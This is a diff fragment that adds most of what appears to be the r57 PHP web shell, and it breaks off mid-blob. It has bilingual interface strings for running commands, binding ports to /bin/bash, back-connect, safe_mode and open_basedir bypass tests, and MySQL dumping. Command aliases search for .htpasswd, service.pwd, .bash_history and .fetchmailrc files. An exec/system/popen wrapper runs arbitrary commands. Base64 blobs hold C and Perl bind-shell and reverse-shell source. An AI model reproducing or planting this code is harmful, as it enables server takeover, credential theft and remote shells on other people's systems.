+'ru_text58'=>'Èìÿ',
+'ru_text59'=>'Ôàéë',
+'ru_text60'=>'Äèðåêòîðèþ',
+'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
+'ru_text61'=>'Ôàéë ñîçäàí',
+'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà',
+'ru_text63'=>'Ôàéë óäàëåí',
+'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà',
+'ru_text65'=>'Ñîçäàòü',
+'ru_text66'=>'Óäàëèòü',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'Êîìàíäà',
+'ru_text69'=>'Ïàðàìåòð1',
+'ru_text70'=>'Ïàðàìåòð2',
+'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)",
+'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text73'=>'Èñêàòü â ïàïêå',
+'ru_text74'=>'Èñêàòü â ôàéëàõ',
+'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå',
+'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'&nbsp;Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;With',
+'eng_text17'=>'&nbsp;&nbsp;Remote file',
+'eng_text18'=>'&nbsp;&nbsp;&nbsp;Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Cat file',
+'eng_butt7' =>'  Show  ',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump table from mysql server',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+);
+
+/*
+Àëèàñû êîìàíä
+Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
+Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
+*/
+
+$aliases=array(
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
+'find suid files'=>'find / -type f -perm -04000 -ls',
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+/* ïîèñê â òåê äèðå config.inc.php */
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+/* ïîèñê íà ñåðâåðå ôàéëîâ config* */
+'find config* files'=>'find / -type f -name "config*"',
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */
+'find config* files in current dir'=>'find . -type f -name "config*"',
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable files'=>'find / -type f -perm -2 -ls',
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories and files'=>'find / -perm -2 -ls',
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+/* ïîèñê âñåõ ôàéëîâ .bash_history */
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+/* ïðîñìîòð îòêðûòûõ ïîðòîâ */
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+
+/* html */
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow      = " <font face=Wingdings color=gray>è</font>";
+$lb         = "<font color=black>[</font>";
+$rb         = "<font color=black>]</font>";
+$font       = "<font face=Verdana size=-2>";
+
+/* change dir */
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+
+/* get OS */
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ { // íà ñëó÷àé åñëè íå óäàëîñü ïîëó÷èòü äèðåêòîðèþ
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } // ïðîáóåì ïîëó÷èòü ÷åðåç php_uname()
+ if(empty($os)){ $os ="-"; $unix=1; } // åñëè íè÷åãî íå ïîëó÷èëîñü òî áóäåò unix =)
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+
+
+/* search text in files */
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); // show founded strings and die
+  }
+
+/* Ïðîâåðêà òîãî ìîæåì ëè ìû âûïîëíÿòü êîìàíäû ïðè âûêëþ÷åííîì safe_mode. Åñëè íåò òî ñ÷èòàåì ÷òî ñåéô âêëþ÷åí */
+/* Îáõîäèò íåâîçìîæíîñòü âûïîëíåíèÿ êîìàíä íà âèíäå êîãäà ñåéô âûêëþ÷åí íî cmd.exe ïåðåèìåíîâàí                */
+/* ëèáî êîãäà â php.ini ïðîïèñàíû disable_functions                                                            */
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+
+/* get server info */
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+
+/* FUNCTIONS */
+
+/* WriteSpace */
+/* tnx to virus for idea */
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+
+function ex($cfe)
+{
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ if(!empty($res)) return $res; else return 0;
+}
+
+/* write error */
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* read error */
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* create error */
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+}
+
+/* permissions */
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) $type='p';
+else if( $mode & 0x2000 ) $type='c';
+else if( $mode & 0x4000 ) $type='d';
+else if( $mode & 0x6000 ) $type='b';
+else if( $mode & 0x8000 ) $type='-';
+else if( $mode & 0xA000 ) $type='l';
+else if( $mode & 0xC000 ) $type='s';
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+/* find path to */
+function which($pr)
+{
+if ($GLOBALS['windows']) { return 0; }
+$path = ex("which $pr");
+if(!empty($path)) return $path; else return 0;
+}
+
+/* create file */
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if($handle = @opendir($dir))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+
+  function DirPrintHTMLHeaders($dir)
+  {
+    $handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          if($count = @preg_match_all($pattern,$CurString,$aa))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+
+/*** base64 ---------------------------------------------------------------------------------------------------- */
+/* --- Port bind source C -------------------------------------------------------------------------------------- */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+/* --- END Port bind source C ---------------------------------------------------------------------------------- */
+/* --- Port bind source PERL ----------------------------------------------------------------------------------- */
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+/* --- END Port bind source PERL ------------------------------------------------------------------------------- */
+/* --- Back connect source PERL -------------------------------------------------------------------------------- */
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+/* --- END Back connect source PERL ---------------------------------------------------------------------------- */
+/* --- Back connect source C ----------------------------------------------------------------------------------- */
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
